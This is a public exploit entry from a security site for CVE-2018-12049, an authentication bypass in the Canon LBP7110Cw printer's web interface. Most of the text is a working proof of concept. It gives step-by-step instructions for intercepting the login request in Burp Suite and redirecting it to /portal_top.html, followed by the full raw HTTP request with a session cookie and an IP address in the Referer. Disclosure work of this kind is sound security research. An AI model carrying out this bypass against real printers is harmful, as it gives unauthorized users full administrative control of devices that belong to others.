Canon LBP7110Cw Authentication Bypass

2018.06.13
Credit: Huy Kha
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

# Exploit Title: Canon LBP7110Cw - Authentication Bypass # Date: 2018-06-07 # Exploit Author: Huy Kha # Vendor Homepage: http://global.canon.com # Version: LBP7110Cw # CVE: CVE-2018-12049 # Severity: High (Leads to full System Manager Mode account take-over) # Description : A remote attacker can bypass the Management Mode on the # Canon LBP7110Cw web interface without a PIN for /checkLogin.cgi via # vectors involving /portal_top.html to get full access to the device. # PoC : # As you can see when we're type a random password. # You'll get an error for an incorrect authentication. # Now with a simple request, we can bypass the authentication # and get full access to the printer with ''Management Mode'' 1. Go to the following url: http://TargetURL/ 2. Click on Management Mode 3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request to the GET /portal_top.html HTTP/1.1 # Request : GET /portal_top.html HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://164.125.112.38/ Cookie: sessid=QegLH5ETb92HEEPWr55AiA## Connection: close Upgrade-Insecure-Requests: 1 # Do we have now access to the printer with Management Mode? : Yes # Impact: A remote attacker can have take-over the whole printer


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top